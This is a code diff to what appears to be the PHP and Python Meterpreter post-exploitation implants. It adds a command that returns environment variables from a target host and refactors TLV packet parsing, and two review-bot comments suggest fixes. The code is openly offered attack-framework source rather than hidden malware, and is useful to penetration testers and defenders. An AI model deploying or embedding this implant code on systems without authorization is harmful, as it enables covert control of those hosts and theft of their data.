@ -197,38 +205,38 @@ define('GLOB_RECURSE',2048);
*/
if (!function_exists('safe_glob')) {
function safe_glob($pattern, $flags=0) {
$split=explode('/',str_replace('\\','/',$pattern));
$mask=array_pop($split);
$path=implode('/',$split);
if (($dir=opendir($path))!==false) {
$glob=array();
while (($file=readdir($dir))!==false) {
// Recurse subdirectories (GLOB_RECURSE)
if (
(
$flags&GLOB_RECURSE) && is_dir($path."/".$file)
&& (!in_array($file,array('.','..'))
# don't follow links to avoid infinite recursion
&& (!is_link($path."/".$file))
)
) {
$glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
($flags&GLOB_PATH?'':$file.'/')));
$split=explode('/',str_replace('\\','/',$pattern));
$mask=array_pop($split);
$path=implode('/',$split);
if (($dir=opendir($path))!==false) {
$glob=array();
while (($file=readdir($dir))!==false) {
// Recurse subdirectories (GLOB_RECURSE)
if (
(
$flags&GLOB_RECURSE) && is_dir($path."/".$file)
&& (!in_array($file,array('.','..'))
# don't follow links to avoid infinite recursion
&& (!is_link($path."/".$file))
)
) {
$glob = array_merge($glob, array_prepend(safe_glob($path.'/'.$file.'/'.$mask, $flags),
($flags&GLOB_PATH?'':$file.'/')));
}
// Match file mask
if (fnmatch($mask,$file)) {
if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
&& ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
&& ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
$glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
}
}
closedir($dir);
if (!($flags&GLOB_NOSORT)) sort($glob);
return $glob;
} else {
return false;
}
// Match file mask
if (fnmatch($mask,$file)) {
if ( ( (!($flags&GLOB_ONLYDIR)) || is_dir("$path/$file") )
&& ( (!($flags&GLOB_NODIR)) || (!is_dir($path.'/'.$file)) )
&& ( (!($flags&GLOB_NODOTS)) || (!in_array($file,array('.','..'))) ) )
$glob[] = ($flags&GLOB_PATH?$path.'/':'') . $file . ($flags&GLOB_MARK?'/':'');
}
}
closedir($dir);
if (!($flags&GLOB_NOSORT)) sort($glob);
return $glob;
} else {
return false;
}
}
}
/**
@ -239,7 +247,7 @@ function safe_glob($pattern, $flags=0) {
*/
if (!function_exists('fnmatch')) {
function fnmatch($pattern, $string) {
return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
return @preg_match('/^' . strtr(addcslashes($pattern, '\\/.+^$(){}=!<>|'), array('*' => '.*', '?' => '.?')) . '$/i', $string);
}
}
@ -261,7 +269,7 @@ function array_prepend($array, $string, $deep=false) {
else
$array[$key] = $string.$element;
return $array;
}
}
@ -519,13 +527,13 @@ function stdapi_fs_md5($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
if (is_callable("md5_file")) {
$md5 = md5_file($path);
} else {
$md5 = md5(file_get_contents($path));
}
$md5 = pack("H*", $md5);
# Ghetto abuse of file name type to indicate the md5 result
if (is_callable("md5_file")) {
$md5 = md5_file($path);
} else {
$md5 = md5(file_get_contents($path));
}
$md5 = pack("H*", $md5);
# Ghetto abuse of file name type to indicate the md5 result
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $md5));
return ERROR_SUCCESS;
}
@ -538,13 +546,13 @@ function stdapi_fs_sha1($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
if (is_callable("sha1_file")) {
$sha1 = sha1_file($path);
} else {
$sha1 = sha1(file_get_contents($path));
}
$sha1 = pack("H*", $sha1);
# Ghetto abuse of file name type to indicate the sha1 result
if (is_callable("sha1_file")) {
$sha1 = sha1_file($path);
} else {
$sha1 = sha1(file_get_contents($path));
}
$sha1 = pack("H*", $sha1);
# Ghetto abuse of file name type to indicate the sha1 result
packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1));
return ERROR_SUCCESS;
}
@ -573,6 +581,41 @@ function stdapi_sys_config_getuid($req, &$pkt) {
}
}
if (!function_exists('stdapi_sys_config_getenv')) {
register_command('stdapi_sys_config_getenv');
function stdapi_sys_config_getenv($req, &$pkt) {
my_print("doing getenv");
$variable_tlvs = packet_get_all_tlvs($req, TLV_TYPE_ENV_VARIABLE);
# If we decide some day to have sys.config.getenv return all env
# vars when given an empty search list, this is one way to do it.
#if (empty($variable_tlvs)) {
# # We don't have a var to look up, return all of 'em
# $variables = array_keys($_SERVER);
#} else {
# $variables = array();
# foreach ($variable_tlvs as $tlv) {
# array_push($variables, $tlv['value']);
# }
#}
foreach ($variable_tlvs as $name) {
$canonical_name = str_replace(array("$","%"), "", $name['value']);
$env = getenv($canonical_name);
if ($env !== FALSE) {
$grp = "";
$grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VARIABLE, $canonical_name));
$grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VALUE, $env));
packet_add_tlv($pkt, create_tlv(TLV_TYPE_ENV_GROUP, $grp));
}
}
return ERROR_SUCCESS;
}
}
# Unimplemented becuase it's unimplementable
#if (!function_exists('stdapi_sys_config_rev2self')) {
#register_command('stdapi_sys_config_rev2self');
@ -696,24 +739,24 @@ function close_process($proc) {
foreach ($proc['pipes'] as $f) {
@fclose($f);
}
if (is_callable('proc_get_status')) {
$status = proc_get_status($proc['handle']);
} else {
# fake a running process on php < 4.3
$status = array('running' => true);
}
if (is_callable('proc_get_status')) {
$status = proc_get_status($proc['handle']);
} else {
# fake a running process on php < 4.3
$status = array('running' => true);
}
# proc_close blocks waiting for the child to exit, so if it's still
# running, don't take a chance on deadlock and just sigkill it if we
# can. We can't on php < 4.3, so don't do anything. This will leave
# zombie processes, but that's better than deadlock.
if ($status['running'] == false) {
proc_close($proc['handle']);
} else {
if (is_callable('proc_terminate')) {
proc_terminate($proc['handle'], 9);
}
}
# proc_close blocks waiting for the child to exit, so if it's still
# running, don't take a chance on deadlock and just sigkill it if we
# can. We can't on php < 4.3, so don't do anything. This will leave
# zombie processes, but that's better than deadlock.
if ($status['running'] == false) {
proc_close($proc['handle']);
} else {
if (is_callable('proc_terminate')) {
proc_terminate($proc['handle'], 9);
}
}
if (array_key_exists('cid', $proc) && $channel_process_map[$proc['cid']]) {
unset($channel_process_map[$proc['cid']]);
}


@ -86,170 +86,185 @@ TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
##
# General
##
TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631
TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631
##
# Fs
##
TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200
TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200
TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230
TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231
TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232
TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233
TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230
TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231
TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232
TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233
##
# Net
##
TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
##
# Socket
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504
##
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504
TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
##
# Registry
TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000
TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003
TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010
TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011
TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
##
TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000
TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003
TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010
TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011
TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
##
# Config
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
##
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
##
# Environment
##
TLV_TYPE_ENV_VARIABLE = TLV_META_TYPE_STRING | 1100
TLV_TYPE_ENV_VALUE = TLV_META_TYPE_STRING | 1101
TLV_TYPE_ENV_GROUP = TLV_META_TYPE_GROUP | 1102
DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
##
# Process
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000
TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005
TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300
TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301
TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302
TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303
TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304
TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305
TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306
TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
##
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000
TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005
TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300
TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301
TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302
TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303
TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304
TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305
TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306
TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404
TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404
TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512
TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512
TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541
TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542
TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550
TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541
TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542
TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550
##
# Ui
##
TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
##
# Event Log
##
TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001
TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001
TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004
TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004
TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006
TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007
TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008
TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009
TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010
TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011
TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012
TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013
TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006
TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007
TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008
TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009
TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010
TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011
TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012
TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013
##
# Power
##
TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100
TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101
TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100
TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101
##
# Sys
@ -367,6 +382,18 @@ def stdapi_sys_config_getuid(request, response):
response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_getenv(request, response):
for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
pgroup = ''
env_var = env_var['value'].translate(None, '%$')
env_val = os.environ.get(env_var)
if env_val:
pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var)
pgroup += tlv_pack(TLV_TYPE_ENV_VALUE, env_val)
response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_sysinfo(request, response):
uname_info = platform.uname()


@ -680,6 +680,30 @@ function tlv_pack($tlv) {
return $ret;
}
function tlv_unpack($raw_tlv) {
$tlv = unpack("Nlen/Ntype", substr($raw_tlv, 0, 8));
$type = $tlv['type'];
my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
$tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
$tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
$tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
$tlv = unpack("Nlen/Ntype", $raw_tlv);
$tlv['value'] = substr($raw_tlv, 8, $tlv['len']-8);
}
else {
my_print("Wtf type is this? $type");
$tlv = null;
}
return $tlv;
}
function packet_add_tlv(&$pkt, $tlv) {
$pkt .= tlv_pack($tlv);
}
@ -689,27 +713,10 @@ function packet_get_tlv($pkt, $type) {
# Start at offset 8 to skip past the packet header
$offset = 8;
while ($offset < strlen($pkt)) {
$tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
$tlv = tlv_unpack(substr($pkt, $offset));
#my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if ($type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
#my_print("Found one at offset $offset");
if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
$tlv = unpack("Nlen/Ntype/a*value", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
$tlv = unpack("Nlen/Ntype/Nvalue", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
$tlv = unpack("Nlen/Ntype/cvalue", substr($pkt, $offset, $tlv['len']));
}
elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
$tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
$tlv['value'] = substr($pkt, $offset+8, $tlv['len']-8);
}
else {
my_print("Wtf type is this? $type");
$tlv = null;
}
return $tlv;
}
$offset += $tlv['len'];
@ -719,6 +726,27 @@ function packet_get_tlv($pkt, $type) {
}
function packet_get_all_tlvs($pkt, $type) {
my_print("Looking for all tlvs of type $type");
# Start at offset 8 to skip past the packet header
$offset = 8;
$all = array();
while ($offset < strlen($pkt)) {
$tlv = tlv_unpack(substr($pkt, $offset));
if ($tlv == NULL) {
break;
}
my_print("len: {$tlv['len']}, type: {$tlv['type']}");
if (empty($type) || $type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
my_print("Found one at offset $offset");
array_push($all, $tlv);
}
$offset += $tlv['len'];
}
return $all;
}
##
# Functions for genericizing the stream/socket conundrum
##
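Review bot: In `packet_get_tlv`, the result of the new `tlv_unpack(substr($pkt, $offset))` call is used without a null check. `tlv_unpack` only has branches for string, uint, bool and raw, so any other meta type leaves `$tlv` null, `$offset += $tlv['len']` adds nothing, and the `while` loop never advances. `packet_get_all_tlvs` already breaks on null; the same guard belongs here, and because `len` is read straight from the packet both loops should also reject a length below the 8-byte header: `if ($tlv == NULL || $tlv['len'] < 8) { break; }`. The `my_print` inside `tlv_unpack` is live, whereas the matching line in `packet_get_tlv` is commented out, so every TLV walked is now logged. The body of `packet_get_tlv` continues outside the hunk.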


@ -158,15 +158,10 @@ class STDProcessBuffer(threading.Thread):
self.data_lock = threading.RLock()
def run(self):
while self.is_alive():
byte = self.std.read(1)
for byte in iter(lambda: self.std.read(1), ''):
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
data = self.std.read()
self.data_lock.acquire()
self.data += data
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
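Review bot: The `for byte in iter(lambda: self.std.read(1), '')` loop in `run` takes and releases `data_lock` by hand, so an exception raised between `acquire()` and `release()` would leave the lock held. `with self.data_lock:` followed by `self.data += byte` does the same work and releases on every path. `is_read_ready` reads `self.data` without the lock; that looks intentional for a length check, but a one-line comment such as `# unlocked read: only the length is inspected` would record it. The `''` sentinel presumably assumes `read(1)` returns a `str` at EOF, which is worth stating in a comment. The class definition starts outside the hunk.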

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

132
